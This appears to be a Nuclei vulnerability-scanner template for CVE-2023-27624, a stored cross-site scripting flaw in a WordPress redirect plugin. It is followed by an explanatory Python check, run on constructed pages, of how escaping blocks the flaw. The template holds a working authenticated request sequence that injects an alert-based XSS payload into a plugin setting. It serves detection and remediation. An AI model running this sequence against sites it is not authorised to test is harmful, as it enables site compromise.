Marcelotorres Redirect After Login plugin <= 0.1.9 contains a stored cross-site scripting vulnerability caused by insufficient sanitization of the login redirect parameter, letting attackers execute scripts in the context of the affected site; exploitation requires admin privileges.

PoC code [published]
id: CVE-2023-27624

info:
  name: WordPress Redirect After Login <= 0.1.9 - Admin Stored XSS
  author: 0x_Akoko
  severity: medium
  description: |
    Marcelotorres Redirect After Login plugin <= 0.1.9 contains a stored cross-site scripting vulnerability caused by insufficient sanitization of the login redirect parameter, letting attackers execute scripts in the context of the affected site; exploitation requires admin privileges.
  impact: |
    Attackers can execute malicious scripts in the context of the affected site, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://patchstack.com/database/vulnerability/redirect-after-login/wordpress-redirect-after-login-plugin-0-1-9-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2023-27624
    cwe-id: CWE-79
    epss-score: 0.00992
    epss-percentile: 0.76377
    cpe: cpe:2.3:a:redirect_after_login_project:redirect_after_login:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: redirect_after_login_project
    product: redirect_after_login
    framework: wordpress
  tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{BaseURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(all_headers, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/options-general.php?page=mtral HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Redirect After Login")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name="_wpnonce" value="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=mtral_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dmtral&mtral_settings%5Bmtral_field_administrator%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_administrator%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&mtral_settings%5Bmtral_field_editor%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_editor%5D=&mtral_settings%5Bmtral_field_author%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_author%5D=&mtral_settings%5Bmtral_field_contributor%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_contributor%5D=&mtral_settings%5Bmtral_field_subscriber%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_subscriber%5D=&submit=Save+Changes

      - |
        GET /wp-admin/options-general.php?page=mtral HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value=""><img src=x onerror=alert(document.domain)>"'
          - 'mtral_field_custom_url_administrator'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a00463044022059b3d304ec5119072fd99646ea8d977a60d2e9dfed8f4dde4fae4ddd9969c1e102207ca1df6aed7732bd9df3b14734989b3851a1234d138b44a5d4a73b022d3858b4:922c64590222798bb761d5b6d8e72950
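The template's final step decides by a literal string match on how the settings page reflects the stored option. The following Python is an added illustration, not part of the template or of the plugin: it reproduces that verification offline over two constructed settings-page fragments, one echoing the stored option raw (the vulnerable behaviour the template detects) and one entity-encoding it the way WordPress's esc_attr() does, which is the class of fix the remediation points to. The form fragments, the nonce value, and the assumption that the option key from the POST body is also the input's `name` attribute are all constructed; nothing is fetched from a site. The parser-based check generalizes the template's literal word match: it flags any stored string that terminates the `value` attribute or injects an element, not only this exact payload.

```python
import html
import re
from html.parser import HTMLParser
from typing import Optional

# Settings input assumed to echo the stored option back. The key is the one
# the template POSTs; that it is rendered as <input name="..."> with the same
# key is an assumption made for this example.
FIELD_NAME = "mtral_settings[mtral_field_custom_url_administrator]"

# The string the template stores in that field (payload taken from the template).
STORED_VALUE = '"><img src=x onerror=alert(document.domain)>'


def safe_attr(value: str) -> str:
    """Attribute-safe rendering: entity-encode &, <, >, " and '.
    This mirrors what WordPress's esc_attr() does and is what the settings
    page must apply before echoing a stored option into value=""."""
    return html.escape(value, quote=True)


def settings_page(rendered_value: str) -> str:
    """Constructed settings-page fragment (not captured from a real site)."""
    return (
        '<form method="post" action="options.php">'
        '<input type="hidden" name="_wpnonce" value="9f3a1b2c4d" />'
        f'<input type="text" name="{FIELD_NAME}" value="{rendered_value}" />'
        '<input type="submit" name="submit" value="Save Changes" />'
        "</form>"
    )


# Vulnerable rendering echoes the raw option; patched rendering escapes it.
VULNERABLE_BODY = settings_page(STORED_VALUE)
PATCHED_BODY = settings_page(safe_attr(STORED_VALUE))

# Same regex the template's extractor uses to pull the form nonce.
NONCE_RE = re.compile(r'name="_wpnonce" value="([a-f0-9]+)"')


def extract_nonce(body: str) -> Optional[str]:
    """Return the _wpnonce value from a settings page, or None if absent."""
    m = NONCE_RE.search(body)
    return m.group(1) if m else None


class _FieldCollector(HTMLParser):
    """Collects every start-tag name and the value attribute of one input."""

    def __init__(self, field_name: str) -> None:
        super().__init__()
        self.field_name = field_name
        self.tags: list = []
        self.field_value: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == self.field_name:
            # html.parser decodes entities in attribute values, so an escaped
            # page hands back exactly the string that was stored.
            self.field_value = attrs.get("value")


def reflection_is_unsafe(body: str, field_name: str, stored: str) -> bool:
    """True when the stored string escapes the value="" attribute.

    A correctly escaped page yields the whole stored string as the attribute
    value and creates no extra element; an unescaped echo terminates the
    attribute early and injects an <img> start-tag into the document."""
    p = _FieldCollector(field_name)
    p.feed(body)
    p.close()
    broke_out = p.field_value != stored
    injected = "img" in p.tags
    return broke_out or injected


if __name__ == "__main__":
    print("nonce:", extract_nonce(VULNERABLE_BODY))
    print("vulnerable body unsafe:",
          reflection_is_unsafe(VULNERABLE_BODY, FIELD_NAME, STORED_VALUE))
    print("patched body unsafe:",
          reflection_is_unsafe(PATCHED_BODY, FIELD_NAME, STORED_VALUE))
```

The vulnerable fragment contains the exact substring the template's first word matcher looks for, so the two checks agree on it; the parser check additionally rejects any other value that breaks attribute context, which is the property a fix must restore rather than the absence of one particular string.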